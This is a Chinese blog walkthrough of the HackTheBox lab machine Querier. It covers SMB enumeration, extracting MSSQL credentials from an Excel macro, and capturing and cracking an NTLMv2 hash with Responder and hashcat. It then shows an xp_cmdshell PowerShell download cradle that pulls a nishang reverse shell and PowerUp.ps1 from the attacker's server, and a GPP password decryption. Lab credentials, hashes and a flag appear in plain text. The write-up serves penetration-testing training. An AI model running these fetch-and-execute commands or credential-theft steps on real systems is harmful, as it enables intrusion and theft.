【HTB系列】靶机Querier的渗透测试

最新推荐文章于 2024-04-25 10:19:58 发布
最新推荐文章于 2024-04-25 10:19:58 发布
阅读量2.3k 收藏 5
点赞数 3
分类专栏: HTB靶场题解集合
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/94382992
版权

总结与反思:

1. 收集信息要全面

2. 用snmp-check检查snmp目标是否开启这个服务

3.  smbmap尝试用匿名用户anonymous来枚举目标的共享资源,可能会枚举成功

4.  使用smbclient连接到smb进行命令操作

5. 使用ole来分析宏

6. 使用mssqlclient.py来连接MSSQL

7. mssqlclient.py开启Windows Authentication参数来,保证正常登录

8.使用mssqlclient.py开启cmd_shell

9. 利用Responder窃取服务器的凭证

10. 利用 | 、less 、\+关键词   快速查找内容

11. 使用hashcat破解NetNTLMv2密码

12. 使用john破解NetNTLMv2密码

13. 利用mssql来执行cmd命令

14. 使用PowerShell攻击框架里的Invoke-PowerShellTcp.ps1脚本反弹shell

15. 使用powershell远程下载反弹shell脚本并执行

16. 使用rlwrap 来解决shell中输出不正常问题(删除,方向键是字符问题)

17 使用cmd远程下载提权信息收集脚本PowerUp.ps1

18. 使用smbmap【The NETBIOS connection with the remote host timed out】的时候需要通过-d添加 域的名字

19. 利用域内获取的账号密码尝试使用psexec进行命令执行【前提smb服务开启,并且有权进行读写】

20. 利用GPP漏洞得到管理员密码

靶机信息

KALI地址:10.10.12.115

 

先用Nmap进行信息收集

nmap -sC -sV -A  10.10.10.125

扫描结果如下:

root@kali:~/HTB/Querier# nmap -sC -sV -A 10.10.10.125                                                                                                        
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-30 14:20 CST                                                                                              
Nmap scan report for 10.10.10.125                                                                                                                            
Host is up (0.40s latency).                                                                                                                                  
Not shown: 996 closed ports                                                                                                                                  
PORT     STATE SERVICE       VERSION                                                                                                                         
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                           
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                   
445/tcp  open  microsoft-ds?                                                                                                                                 
1433/tcp open  ms-sql-s      Microsoft SQL Server  14.00.1000.00                                                                                   [64/168]
| ms-sql-ntlm-info:                                                                                                                                          
|   Target_Name: HTB                                                                                                                                         
|   NetBIOS_Domain_Name: HTB                                                                                                                                 
|   NetBIOS_Computer_Name: QUERIER                                                                                                                           
|   DNS_Domain_Name: HTB.LOCAL                                                                                                                               
|   DNS_Computer_Name: QUERIER.HTB.LOCAL                                                                                                                     
|   DNS_Tree_Name: HTB.LOCAL                                                                                                                                 
|_  Product_Version: 10.0.17763                                                                                                                              
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                     
| Not valid before: 2019-06-28T04:08:30                                                                                                                      
|_Not valid after:  2049-06-28T04:08:30                                                                                                                      
|_ssl-date: 2019-06-30T05:22:01+00:00; -1h00m00s from scanner time.                                                                                          
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).                                                          
TCP/IP fingerprint:                                                                                                                                          
OS:SCAN(V=7.70%E=4%D=6/30%OT=135%CT=1%CU=30857%PV=Y%DS=2%DC=T%G=Y%TM=5D1855                                                                                  
OS:13%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=                                                                                  
OS:U)SEQ(SP=F9%GCD=1%ISR=10A%TI=I%CI=I%TS=U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS                                                                                  
OS:%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W                                                                                  
OS:3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=                                                                                  
OS:Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S                                                                                  
OS:%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=                                                                                  
OS:Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%                                                                                  
OS:RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0                                                                                  
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIP                                                                                  
OS:CK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)                                                                                                                 
                                                                                                                                                             
Network Distance: 2 hops                                                                                                                                     
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows 
Host script results:                                                                                                                                         
|_clock-skew: mean: -1h00m00s, deviation: 0s, median: -1h00m00s                                                                                              
| ms-sql-info:                                                                                                                                               
|   10.10.10.125:1433:                                                                                                                                       
|     Version:                                                                                                                                               
|       name: Microsoft SQL Server                                                                                                                           
|       number: 14.00.1000.00                                                                                                                                
|       Product: Microsoft SQL Server                                                                                                                        
|_    TCP port: 1433                                                                                                                                         
| smb2-security-mode:                                                                                                                                        
|   2.02:                                                                                                                                                    
|_    Message signing enabled but not required                                                                                                               
| smb2-time:                                                                                                                                                 
|   date: 2019-06-30 13:22:03                                                                                                                                
|_  start_date: N/A                                                                                                                                          
                                                                                                                                                             
TRACEROUTE (using port 3306/tcp)                                                                                                                             
HOP RTT       ADDRESS                                                                                                                                        
1   395.56 ms 10.10.12.1                                                                                                                                     
2   396.53 ms 10.10.10.125                                                                                                                                   
                                                                                                                                                             
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                        
Nmap done: 1 IP address (1 host up) scanned in 75.70 seconds

可以看到目标机器存在MSSQL,SMB服务

我们在检查下snmp服务是否存在

发现snmp服务不存在

那么我们现在根据nmap的结果来进行测试。

我们用smbmap来尝试枚举下目标的资源,发现访问被禁止

那么我们尝试下匿名的用户去访问,发现资源被枚举出来了

这里的Reports不是系统自带的,所以我们对Reports进行信息挖掘

那么我们用smbclient来访问Reports目录,并执行命令操作

发现目录里面有一个excel文件,我们把他下载回来

xls是2003版本下的文件,不管有没有宏程序的话都是xls文件。

2007做了区分,XLSM文件XLSX文件都是excel2007文件,但前者是含有宏启用,Excel中默认情况下不自动启用宏。

Excel不会执行宏XLSX文件,即使它们包含宏代码,因此含有宏的文件可以保存为xlsm文件。

这个“Currency Volume Report.xlsm”是存在宏的,这里我们用下OLE工具套件来分析office宏

用apt安装ole套件

然后我们用olevba去分析我们刚刚下载来的XLSM文件

root@kali:~/HTB/Querier/smb# olevba Currency\ Volume\ Report.xlsm 

olevba 0.51 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
Analysis...
' further testing required
#里面宏代码内容
Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
#发现2个可疑的宏
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+

我们可以发现里面的MSSQL连接字符串

Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

然后我们使用mssqlclient.py进行登录,如果你没这个py脚本可以从下面的项目地址获得

项目地址:https://github.com/sdfzy/impacket

把mssqlclient.py拷贝出来

然后进行登录,发现登录失败

我们需要开启Windows Authentication,才能正常登录

然后我们访问下cmd,发现被禁止

因为我们的权限不够,但是我们可以用Responder对服务器上的凭证进行窃取

关于Responder的原理和窃取可以看这个文章:https://blog.csdn.net/nzjdsds/article/details/94314995

原理是,通过LLMNR/NBT-NS欺骗攻击,让MSSQL去访问我们伪造的服务,当MSSQL去执行时就会把它自己的凭证发给我们,我们通过破解它的凭证在返回去登录MSSQL,得到高权限

Responder地址:https://github.com/sdfzy/Responder

我们开启Responder,-I 填的是我们连接HTB的网络接口,可以通过ifconfig查看

root@kali:~/HTB/Querier/Responder# python Responder.py -I tun0 -i 10.10.12.115
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.12.115]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']



[+] Listening for events...

然后我们去MSSQL执行命令

之后我们的Responder就能窃取到凭证

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash     : mssql-svc::QUERIER:719e19ceae7c4441:EBBDF25ADE14E7C1FFB5F85A75C5297C:0101000000000000C0653150DE09D201C0C49F0639705148000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000236A52A873A5D10CDB0271A7669DD127DF24262F1C6E8B7E9E4B29DA4036B0020A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310032002E00310031003500000000000000000000000000                                               
[*] Skipping previously captured hash for QUERIER\mssql-svc

然后我们用hashcat去破解下

首先我们查下NetNTLMv2的模式代码是多少

hashcat --example-hashes |less

进入后     / + NetNTLM        进行搜索

可以看到NetNTLMv2模式代码为5600

然后我们就可以开始破解

hashcat -m 5600 Querier.NetNTLMv2 /usr/share/wordlists/rockyou.txt

也可以用john来破解NetNTLMv2密码

用户名:mssql-svc 密码:corporate568

然后我们用获取到的凭证再次用mssqlclient.py登录

help下

开启cmd功能

我们来测试查看cmd是否真的开启

命令是正常执行的

我们使用nishang的反弹shell脚本

nishang项目地址:https://github.com/sdfzy/nishang

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1

然后我们编辑下reverse.ps1脚本在底下加上,IP写上你自己的IP,端口写上你nc监听的端口

然后还是老样子用python开启简单HTTP服务,让靶机把我们的reverse.ps1下载并执行

xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.12.115:8000/reverse.ps1\")

然后我们就得到一个shell,这里我是用了rlwrap来解决shell中(删除键,方向键等)输出不正常问题

然后我们就能得到user的flag

c37b41bb669da345bb14de50faab3c16

接下来就是开始提权

这里我们使用PowerSploit里面的提权信息收集脚本PowerUp.ps1

项目地址:https://github.com/PowerShellMafia/PowerSploit

一样把脚本拷贝过来,并让靶机下载执行

IEX(New-Object Net.Webclient).downloadstring("http://10.10.12.115:8000/PowerUp.ps1") Invoke-AllChecks

这里可能需要等几分钟出结果

这里我们看到一个服务滥用

我们尝试利用下

发现john确实加进来了,我们利用smbmap利用下,这里需要增加-d参数   写上域的名字

然后发现这个john的权限也不够

我们换一个提权方式

Changed   : {2019-01-28 23:12:48}                                                                                                                            
UserNames : {Administrator}                                                                                                                                  
NewName   : [BLANK]                                                                                                                                          
Passwords : {MyUnclesAreMarioAndLuigi!!1!}                                                                                                                   
File      : C:\ProgramData\Microsoft\Group                                                                                                                   
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

这里还有一组管理员的账号和密码我们再次进行尝试,成功!

提权成功,我们已经拿到system权限了,这里就不演示cat root flag了

这里还有一种是GPP漏洞的利用,原理跟上面是差不多的。只是需要自己手动破解密码

GPP提权

我们可以通过找到组策略里面的管理员密码并破解出来

Groups.xml

<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>

我们仍然需要解密密码,这可以通过以下方式轻松完成gpp-decrypt:

root@kali:~/HTB/Querier# gpp-decrypt CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ                                        
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
MyUnclesAreMarioAndLuigi!!1!

这里看到这里的密码也是我们上面获取到的密码一样

MyUnclesAreMarioAndLuigi!!1!

 

大方子
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB-Querier靶场看内网渗透
Ms08067安全实验室
07-05 682
文章来源|MS08067 内网安全知识星球本文作者:阿青(Ms08067内网安全小组成员)querier作为htb中的一个靶标环境,其中涉及的⼀些基础知识和工具应用值得学习,对该靶标的渗透...
hackthebox - Querier (SqlServer mssql 渗透 & olevba & group policy passwords 提权)
冬萍子癸水
02-13 468
1、扫描 可见smb和mssql 开了。连web都没有,就这几个端口渗透了 C:\root> nmap -A 10.10.10.125 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-13 09:36 CST Nmap scan report for 10.10.10.125 (10.10.10.125) Host is up (0.34s latency). Not shown: 996 closed ports PORT STATE S
HTB靶场 Perfection
最新发布
m0_62438849的博客
04-25 832
其余恶意代码=echo+[payload]|+base64+-d+|+bash (+表示空格)总的 category1=%25>;写一段反弹shell代码#!经过base64编码。
SSL Certificate Signed Using Weak Hashing Algorithm(CVE-2004-2761)
weixin_40133285的博客
04-26 3万+
SSL Certificate Signed Using Weak Hashing Algorithm(CVE-2004-2761) Windows Server 2012 R2 验证存在、搜索或下载证书工具、生成证书、导入证书、添加证书访问权限、在RDP-tcp中加载证书、验证证书生效情况、遗留问题 Trusted、SSL Self-Signed Certificate可申请官方机构颁布证书 The remote service uses an SSL certificate chain that has
vulstack2(hydra爆mssql、免杀360、cs、msf渗透、weblogic、computer brower服务支持6118,域管密码过期kerberos认证错误导致部分域服务不可用)
qq_45290991的博客
09-24 1729
很久之前打了第一个靶场,但是打的不全,不舒坦,不够彻底,由于一直报rpc连接失败所以有的步骤不顺,这次学了一点小小的免杀技巧,过来带着练习的心态学学这个靶场。 0、环境搭建(难点) 环境搭建参考:漏洞详情 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 红日靶场二 WalkThrough – Crispr –热爱技术和生活 记得要在web机子里面手动开启服务,在 C:\Oracle\Middleware\user_projects\doma
利用MSSQL搭建代理突破DMZ访问受限网络
anquanzushiye的博客
02-20 1421
0x00 背景介绍渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备...
HTB系列靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
30 天渗透测试练习2.pdf
10-06
7. **HackTheBox (HTB) 机器**:HTB是一个在线平台,提供了多种级别的虚拟机,用于提升渗透测试技能。例如Pilgrimage、Topology、PC、Busqueda等,每个机器都有不同的攻防挑战。 8. **基于路由的SSRF(Server-Side ...
HTB单线策略测试
08-18
本话题我们将深入探讨HTB单线策略测试的相关知识点。 首先,理解HTB的基本原理是至关重要的。HTB算法基于令牌桶理论,通过在虚拟桶中存储令牌来控制发送数据的速率。每个数据包需要一定的令牌才能被发送,当桶中...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 渗透测试通常分为几个阶段,包括信息收集、漏洞扫描、漏洞利用、权限提升、横向移动和持久化等。在Easy级别的靶机中,我们可以...
HTB打靶日记:Stocker
01-15
在本文中,我们将深入探讨一个名为“Stocker”的Hack The Box (HTB)靶场案例,这是一次针对Web安全、Linux系统以及JavaScript的渗透测试练习。首先,我们从信息收集开始,这是任何渗透测试的第一步。 使用Nmap进行...
打点-进入内网(一)
qq_44555676的博客
08-24 683
应用系统漏洞利用常见漏洞扫描1.Nmap扫描技巧2.impacket框架之mssql服务器安全检测mssglclient与其他工具相比的优势Mssqlclient的基本使用命令为Impacket网络协议工具包安装举例分析几种实际使用情况3.读入数据 常见漏洞扫描 1.Nmap扫描技巧 auth 处理身份验证 broadcast 网络广播 brute 暴力猜解 default 默认 discovery 服务发现 dos 拒绝服务 exploit 漏洞利用 external 外部扩展 fuzzer 模糊测
Impacket官方使用指南
weixin_30877755的博客
04-09 2825
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
如何使用John Ripper单破解模式破解密码
cunjiu9486的博客
10-08 1100
As we stated before in single crack mode[List.Rules:Single]method of configuration file is used. In this mode login:password are cracked by using default password-list. Single Mode is much faster th...
Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28
闵行小鱼塘
04-28 858
本节学习客户端渗透
轻松渗透Windwos之利用phpmyadmin
weixin_50763496的博客
11-27 422
轻松渗透 Windows 之利用 phpmyadmin 德慎思信息安全-安全播客05 个人隐私漫谈 提要 在网上看到一个练习用的渗透靶场,没有看到管理密码。那么今天我们就来渗透下这个靶场。 链接:https://pan.baidu.com/s/1I0oJLdVzjv0grHzlgITvLg 提取码:dcib [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NV5XyET5-1606458764977)(img/轻松渗透Windwos之利用phpmyadmin/image-202
PostMan Self-signed SSL certificates are being blocked:
TaLinBoy的博客
07-25 7141
打开 PostMan &gt; settings  &gt;  Gennal &gt; 关闭 SSL certificates verification
网络请求及各类错误代码含义总结(Errors Code)
热门推荐
DCSnail-蜗牛
03-19 7万+
  在很多时候都会遇到错误, 还会带有一些 Error Code , 比如在各种网络请求, 文件操作, cookie 错误等各种错误的代码和错误代码对应的含义. 以下目录为 SOCKS4 Errors, SOCKS5 Errors, FTP Errors, HTTP Errors, CFURLConnection &amp; CFURLProtocol Errors, File Errors, ...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值